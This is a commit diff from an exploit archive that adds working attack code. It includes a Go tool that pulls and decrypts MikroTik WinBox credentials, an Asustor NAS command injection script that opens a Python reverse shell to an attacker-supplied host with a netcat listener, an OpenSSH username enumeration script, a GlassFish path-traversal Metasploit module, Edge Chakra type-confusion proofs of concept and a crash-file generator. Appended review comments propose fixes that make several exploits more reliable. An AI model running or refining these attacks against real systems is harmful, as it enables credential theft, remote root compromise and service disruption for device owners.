DB: 2018-08-18

10 changes to exploits/shellcodes

TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
CEWE Photoshow 6.3.4 - Denial of Service (PoC)
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl
Microsoft Edge Chakra JIT - Scope Parsing Type Confusion
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion

OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)

Mikrotik WinBox 6.42 - Credential Disclosure (golang)

Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)

Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection

ADM 3.1.2RHG1 - Remote Code Execution
This commit is contained in:
Offensive Security 2018-08-18 05:01:47 +00:00
parent 0424dfc05b
commit 16744756bc
11 changed files with 716 additions and 2 deletions


@ -0,0 +1,234 @@
/*
# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )
# Author: Maxim Yefimenko ( @slider )
# Date: 2018-08-06
# Sotware Link: https://mikrotik.com/download
# Vendor Page: https://www.mikrotik.com/
# Version: 6.29 - 6.42
# Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android ( wherever it was possible to compile.. it's golang ^_^ )
# CVE: CVE-2018-14847
# References:
# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/
# ( BasuCert ) https://github.com/BasuCert/WinboxPoC
# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp
# and special thanks to Dmitriy_Area51
*/
package main
import (
"crypto/md5"
"fmt"
"net"
"os"
"strings"
"time"
)
var (
a = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
0x00, 0x00}
b = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00}
buf = make([]byte, 1024*8)
)
func checkErr(err error) {
if err != nil {
fmt.Println("Error:" + err.Error())
}
}
func decryptPassword(user []byte, passEnc []byte) string {
var passw []byte
hasher := md5.New()
hasher.Write(user)
hasher.Write([]byte("283i4jfkai3389"))
key := hasher.Sum(nil)
for i := 0; i < len(passEnc); i++ {
passw = append(passw, passEnc[i]^key[i%len(key)])
}
return string(ASCIIonly(passw))
}
func ASCIIonly(s []byte) []byte {
for i, c := range s {
if c < 32 || c > 126 {
return s[:i]
}
}
return s
}
func extractPass(buff []byte) (s []string) {
var (
usr []byte
pwd []byte
)
//searching for StartOfRecord
for i := 0; i < len(buff); i++ {
if i+2 >= len(buff) {
break
}
if (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {
// fmt.Printf("Probably user record at offset 0x%.5x\n", i)
//some bytes ahead is enable/disable flag
i += int((buff[i+2] - 5))
if i >= len(buff) {
break
}
//searching for StartOfRecNumber
if i+3 >= len(buff) {
break
}
for !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {
i++
if i+3 >= len(buff) {
break
}
}
i += 4
if i >= len(buff) {
break
}
// fmt.Printf("SORn: 0x%X\n", i)
// comment?
i += 18
if (i + 4) >= len(buff) {
break
}
if (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {
if (i+1)+int(buff[i]) >= len(buff) {
break
}
i += int(buff[i])
} else {
i -= 18
}
//searching for StartOfPassword
if i+4 >= len(buff) {
break
}
for !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {
i++
if i+4 >= len(buff) {
break
}
}
i += 5
if (i + 3) >= len(buff) {
break
}
if (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {
pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]
i += int(buff[i-1])
}
//searching for StartOfUsername
if i+3 >= len(buff) {
break
}
for !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {
i++
if i+3 >= len(buff) {
break
}
}
i += 4
if i >= len(buff) {
break
}
if buff[i] != 0x00 {
if i+int(buff[i]) >= len(buff) {
break
}
usr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])
i += int(buff[i])
}
decrypted := decryptPassword(usr, pwd)
//fmt.Printf(" --> %s\t%s\n", buff[i], decrypted)
if len(usr) != 0 {
s = append(s, strings.Join([]string{string(usr), string(decrypted)}, ":"))
}
}
}
return s
}
func main() {
if len(os.Args) < 2 {
fmt.Printf(" [ usage: %s 192.168.88.1\n\n", os.Args[0])
os.Exit(0)
}
conn, err := net.DialTimeout("tcp", os.Args[1]+":8291", time.Duration(3*time.Second))
if err != nil {
fmt.Println(err.Error())
return
}
defer conn.Close()
conn.Write(a)
reqLen, err := conn.Read(buf)
checkErr(err)
if reqLen < 38 {
panic("First packet is too small")
}
b[19] = buf[38]
conn.Write(b)
reqLen, err = conn.Read(buf)
checkErr(err)
db := buf[:reqLen]
s := extractPass(db)
for i, acc := range s {
data := strings.SplitN(acc, ":", 2)
fmt.Printf(" [%d] %s\t%s\n", i, data[0], data[1])
}
}
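Review bot: In extractPass the password slice `pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]` indexes the package-level `buf` instead of the `buff` parameter and has no upper-bound check, unlike the username slice a few lines later which tests `i+int(buff[i]) >= len(buff)` first; a truncated or hostile reply can push the end index past len(buff), and it only avoids a panic because the 8 KiB backing array happens to be large enough, after which stale bytes are "decrypted". Guard it the same way as the username: `if i+int(buff[i-1]) > len(buff) { break }` followed by `pwd = buff[i : i+int(buff[i-1])]`. Separately, main reads the user.dat reply with a single `conn.Read(buf)` and no deadline, so a reply that arrives in more than one TCP segment is silently truncated and a host that accepts the connection but never answers hangs the tool; read until EOF or the announced length under `conn.SetReadDeadline`, and note that checkErr only prints and execution continues with whatever `reqLen` came back.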


@ -0,0 +1,95 @@
# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
# Author: Matthew Fulton & Kyle Lovett
# Date: 2018-07-01
# Vendor Homepage: https://www.asustor.com/
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
# Version: <= ADM 3.1.2RHG1
# Tested on: ASUSTOR AS6202T
# CVE : CVE-2018-11510
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
#!/usr/bin/python
"""
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
if exploitation occurs successfully, a root shell is granted
Authors: matthew fulton and Kyle Lovett
Date: 27 May 2018
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
After a twitter communication Kyle was kind enough to share a few details
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
Vendor link: https://www.asustor.com
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
starting netcat listener on port 1234
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # uname -a;id
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
"""
import sys, threading, time, os, subprocess
import urllib2
import ssl
import argparse
class exploit(object):
def __init__(self,interval=1):
self.target = args.target
self.rport = args.port
self.lport = args.lport
self.remote = args.remote
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
#ignore ssl warnings
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
try:
turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
response=urllib2.urlopen(turl,context=ctx)
time.sleep(self.interval)
except urllib2.URLError as e:
print "Something is wrong:|"
print e
os._exit(1)
def revShell():
print "starting netcat listener on port "+args.lport
cmd = "nc -lv {0}".format(args.lport)
os.system(cmd)
def main():
print """exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
goexploit = exploit()
revShell()
if __name__ == '__main__':
Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
parser=argparse.ArgumentParser(description=help)
parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
parser.add_argument('--port', '-p', default="8001")
parser.add_argument('--lport', '-l', default="1234")
parser.add_argument('--remote','-r', default="192.168.1.253")
args = parser.parse_args()
main()
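Review bot: `parser=argparse.ArgumentParser(description=help)` passes the Python builtin `help` rather than the `Help` string defined two lines above, so the usage banner shows the builtin's repr instead of the intended text; it should be `description=Help`. `--target` is declared with both `required=True` and a default, which argparse resolves by always requiring it, so the default is dead — keep one or the other. The `while True` loop in exploit.run re-requests the injected reverse-shell URL every `interval` second for as long as `nc -lv` (a single-connection listener) is running, which presumably spawns a fresh shell process on the NAS on each iteration; issue the request once, or break after the first successful `urlopen`, and the unused `response` variable can go with it.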

84
exploits/linux/remote/45210.py Executable file

@ -0,0 +1,84 @@
#!/usr/bin/env python
# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import argparse
import logging
import paramiko
import socket
import sys
class InvalidUsername(Exception):
pass
def add_boolean(*args, **kwargs):
pass
old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)
def userauth_failure(*args, **kwargs):
raise InvalidUsername()
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()
sock = socket.socket()
try:
sock.connect((args.hostname, args.port))
except socket.error:
print '[-] Failed to connect'
sys.exit(1)
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[-] Failed to negotiate SSH transport'
sys.exit(2)
try:
transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print '[*] Invalid username'
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print '[+] Valid username'
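Review bot: The final handler treats any `paramiko.ssh_exception.AuthenticationException` raised after the patched service_accept as proof of a valid user, but a server that drops the connection for unrelated reasons (rate limiting, MaxStartups, a non-OpenSSH implementation that closes on the malformed publickey request) lands in the same branch and is printed as `[+] Valid username`, while any other SSHException or socket.error escapes as a traceback. Add, after the AuthenticationException clause (it is a subclass of SSHException, so order matters), `except (paramiko.ssh_exception.SSHException, socket.error): print '[?] Inconclusive'` and try a known-invalid control name first so the operator can tell a real oracle from noise. The technique also relies on paramiko's private `AuthHandler._handler_table` and on replacing `Message.add_boolean`, so a header comment pinning the paramiko version this was tested with would spare the next user a silent false result when those internals change.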

74
exploits/linux/webapps/45198.rb Executable file

@ -0,0 +1,74 @@
# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
# Author: Dhiraj Mishra
# Date: 2018-08-14
# Software: Oracle Glassfish Server OSE
# Version: 4.1
# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip
# CVE: 2017-1000028
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
which exits in administration console of Oracle GlassFish Server 4.1, which is
listening by default on port 4848/TCP.
},
'References' =>
[
['CVE', '2017-1000028'],
['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
['EDB', '39441']
],
'Author' =>
[
'Trustwave SpiderLabs', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => 'Aug 08 2015',
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(4848),
OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "%c0%af.." * datastore['DEPTH'] << filename
res = send_request_raw({
'method' => 'GET',
'uri' => "/theme/META-INF/prototype#{traversal}"
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - #{res.body}")
path = store_loot(
'oracle.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end
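Review bot: run_host treats any HTTP 200 as a successful read — `unless res && res.code == 200` — so a 200 carrying the admin console's HTML or an error page is stored as loot and reported with `File saved in:`; at minimum also reject an empty body and one that looks like HTML, e.g. `if res.body.to_s.strip.empty? || res.body =~ /\A\s*</i` then `print_error('Nothing was downloaded')` and return. The DEPTH/FILEPATH defaults (13 and `/windows/win.ini`) target a Windows install although the module is filed under linux/webapps; a Linux default such as `/etc/passwd`, or a sentence in the description saying the defaults assume Windows, would avoid confusion. The Description string also has a typo: 'which exits in administration console' should read 'which exists in the administration console'.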


@ -0,0 +1,31 @@
/*
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
PoC:
*/
function opt(arr, obj) {
arr[0] = 1.1;
obj.x;
arr[0] = 2.3023e-320;
}
let arr = [1.1];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
let get = Map.prototype.get;
Map.prototype.get = function (key) {
Map.prototype.get = get;
arr[0] = {};
return this.get(key);
};
opt(arr, Intl);
alert(arr[0]);
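Review bot: The header states the bug fires only because the first property access on Intl runs Intl.js, yet nothing in the PoC guarantees a fresh realm; if the page or shell has already touched Intl (for example via toLocaleString) the initialization has happened, `Map.prototype.get` is never hit and the PoC silently does nothing. A one-line comment before `opt(arr, Intl);` such as `// precondition: Intl must be untouched in this realm — the first access runs Intl.js` would make that explicit. `alert` is also browser-only; a reader running this under the ChakraCore shell will need `print` instead, which is worth a note.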


@ -0,0 +1,79 @@
// PoC:
async function trigger(a = class b {
[await 1]() {
}
}) {
}
let spray = [];
for (let i = 0; i < 100000; i++) {
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
trigger();
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
Here's the generated bytecode.
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
18 locals (8 temps from R10), 5 inline cache
Constant Table:
======== =====
R1 LdRoot
R2 LdC_A_I4 int:1
R3 Ld_A (undefined)
R4 LdFalse
Implicit Arg Ins:
======== === ===
R5 ArgIn_A In1
0000 InitUndecl R6
0002 TryCatch x:004c ( 71)
Line 1: a = class b {
Col 24: ^
0005 BrSrNeq_A x:0048 ( 62) R5 R3
000a NewScFunc R13 = b()
000d InitClass R13
0012 ProfiledLdFld R14 = R13.prototype #0 <0>
0016 SetHomeObj R13 R14
001b NewScObjectSimple R9
001d ProfiledStFld R9.value = R2 #1 <1>
0021 ProfiledStFld R9.done = R4 #2 <2>
0025 Yield R9 R9 <<-----------------------------------------------
0028 ResumeYield R15 R9
002b NewScFunc R16 = b.prototype[]()
002e SetComputedNameVar R16 R15
0033 ProfiledLdFld R14 = R13.prototype #0 <0>
0037 InitClassMemberComputedName R14[R15] = R16
003d SetHomeObj R16 R14
0042 InitConst R6 R13
0045 Ld_A R5 R13
0048 Leave
0049 Br x:0074 ( 40)
004c Catch R10
004e Nop
004f ProfiledLdRootFld R11 = root.Promise #4 <4>
0055 ProfiledLdMethodFld R12 = R11.reject #3 <3>
0059 StartCall ArgCount: 2
005c ArgOut_A Out0 = R11
005f ArgOut_A Out1 = R10
0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3> <0>
006c Ld_A R0 R12
006f Leave
0070 Br x:0076 ( 3)
0073 Leave
0074 LdUndef R0
Line 5: }
Col 1: ^
0076 Ret
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
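Review bot: The closing paragraph says the incorrect bytecode 'allowed it at (a)', but no marker (a) appears anywhere in the dump; the long arrow on `0025 Yield R9 R9` is presumably the intended spot. Either label that line `(a)` or rewrite the sentence to name the offset, e.g. 'allowed it at offset 0025, inside the TryCatch range 0002–004c', so the reader can place the Yield relative to the Leave at 0048. Minor: 'shoud not be performed' should be 'should not be performed'.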


@ -0,0 +1,38 @@
/*
Here's the method.
template <typename TPropertyIndex>
template <typename TPropertyIndexFrom>
void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
{
this->Attributes = descriptor.Attributes;
this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
this->IsAccessor = descriptor.IsAccessor;
#if ENABLE_FIXED_FIELDS
this->IsInitialized = descriptor.IsInitialized;
this->IsFixed = descriptor.IsFixed;
this->UsedAsFixed = descriptor.UsedAsFixed;
#endif
}
Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.
PoC:
*/
let x = 1;
this.x = 0x1234; // IsShadowed
// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
for (let i = 0; i < 0x10000; i++) {
this['a' + i] = 1;
}
// Set IsAccessor
this.__defineSetter__('x', () => {});
// Type confusion
this.x;
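Review bot: The excerpt shows only the fields CopyFrom does copy, so the claim that `IsShadowed` is skipped — and 'one of them', which implies further uncopied fields — cannot be checked from the listing alone; quoting the descriptor's field declarations, or naming the other fields that are dropped, next to the method would let a reader verify the gap instead of taking it on trust. The comment `Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.` would also benefit from saying why 0x10000 properties is enough, presumably because it exceeds the threshold at which the global object's type handler is swapped; as written the constant looks arbitrary.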


@ -0,0 +1,26 @@
/*
This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for issue 1531 .
PoC:
*/
function opt(arr, value) {
arr.push(value); // <--------
arr[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 0x10000; i++) {
let tmp = [1.1, 2.2, 3.3];
delete tmp[1];
opt(tmp, 2.2);
}
let arr = [1.1];
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
alert(arr);
}
main();
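Review bot: The explanation refers twice to 'issue 1531' with no tracker name, URL or commit, so a reader cannot locate the patch this PoC is said to bypass; cite the tracker entry or the ChakraCore fix commit alongside the number. The line `opt(arr, -5.3049894784e-314); // MAGIC VALUE!` is likewise unexplained — a comment stating what bit pattern that double encodes and why the type-confused SetItem needs it would make the PoC reproducible without re-deriving it. Minor: 'inlineed' should be 'inlined', and `alert` is browser-only.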


@ -0,0 +1,18 @@
/*
The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for ICU don't check whether the given object has been initialized. This allows to initialize the same object multiple times which can lead to type confusion.
It seems the recent version of Edge in Windows Insider Preview has started to use ICU. Tested on Microsoft Edge 42.17672.1000.0 and Microsoft EdgeHTML 17.17672.
The initializer for ICU has no check:
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L1151
The initializer for WinGlob has a check:
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L3046
PoC:
*/
let object = {};
Intl.NumberFormat.apply(object);
Intl.DateTimeFormat.apply(object);
Intl.DateTimeFormat.prototype.formatToParts.apply(object);
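Review bot: The three PoC lines are uncommented, so it is not obvious which call performs the double initialization the header describes and which one actually triggers the confusion; a short comment per line — the first two initializing the same plain object first as a NumberFormat and then as a DateTimeFormat, the third consuming it as a DateTimeFormat — would tie the code back to the explanation. It would also help to state that the PoC only reproduces on an ICU-backed build, since the header itself says the WinGlob initializer has the check.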


@ -0,0 +1,25 @@
# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-17
# Homepage: https://cewe-photoworld.com/
# Software Link: https://cewe-photoworld.com/creator-software/windows-download
# Tested Version: 6.3.4
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of
# "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 4000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
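Review bot: The bare `except:` swallows every exception, including KeyboardInterrupt, and prints only 'File cannot be created' with no reason; catch `IOError as e` and print `e`. Opening the file without a context manager also leaks the handle if `f.write` raises before `f.close()`; `with open("exploit.txt", "w") as f: f.write(payload)` closes it on every path. `payload = buffer` is a redundant alias — build the 4000-byte string under one name.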


@ -6046,9 +6046,15 @@ id,file,description,date,author,type,platform,port
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80
45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
45211,exploits/windows_x86-64/dos/45211.py,"CEWE Photoshow 6.3.4 - Denial of Service (PoC)",2018-08-17,"Gionathan Reale",dos,windows_x86-64,
45213,exploits/windows/dos/45213.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl",2018-08-17,"Google Security Research",dos,windows,
45214,exploits/windows/dos/45214.js,"Microsoft Edge Chakra JIT - Scope Parsing Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16693,6 +16699,7 @@ id,file,description,date,author,type,platform,port
45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows,
45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
